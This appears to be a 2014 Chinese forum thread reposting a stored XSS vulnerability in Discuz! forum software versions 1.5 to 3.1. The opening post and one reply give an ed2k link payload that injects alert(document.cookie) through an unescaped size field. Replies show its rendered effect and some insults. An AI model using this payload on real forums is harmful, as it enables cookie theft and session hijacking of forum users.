Antergone 发表于 2014-3-2 16:48:14

【转载】Discuz!1.5到3.1版本通用储存型xss



发表一个帖子,内容包含

**** Hidden Message *****

ed2k://|file|test|'+alert(document.cookie)+'|test
然后 $size -> '+alert(document.cookie)+' 被直接输出


测试


U神V5 发表于 2014-3-2 16:58:32

刚看到这帖子就谈了

U神V5 发表于 2014-3-2 17:02:21

ed2k://|file|test|'+alert(document.cookie)+'|test/

空中楼阁 发表于 2014-3-2 17:11:05

Diana 发表于 2014-3-2 17:18:07

本帖最后由 Diana 于 2014-3-2 17:32 编辑

插那么多 作甚 。。



test (undefined Bytes)

test (undefined Bytes)
test (undefined Bytes)

test (undefined Bytes)

test (undefined Bytes)

test (undefined Bytes)
test (undefined Bytes)

test (undefined Bytes)
test (undefined Bytes)

test (undefined Bytes)

nick2011 发表于 2014-3-2 18:02:51

我去,哪个论坛都是         

world 发表于 2014-3-2 19:27:33

至高无上 发表于 2014-3-2 19:36:29

顶楼主啦..希望楼主多发精品好帖啦.....

Antergone 发表于 2014-3-2 19:52:05

U神V5 发表于 2014-3-2 17:02 static/image/common/back.gif
ed2k://|file|test|'+alert(document.cookie)+'|test/

贱人。。。。

Antergone 发表于 2014-3-2 19:52:19

Diana 发表于 2014-3-2 17:18 static/image/common/back.gif
插那么多 作甚 。。




贱人。。。。。鄙视你
页: [1] 2 3 4 5 6 7
查看完整版本: 【转载】Discuz!1.5到3.1版本通用储存型xss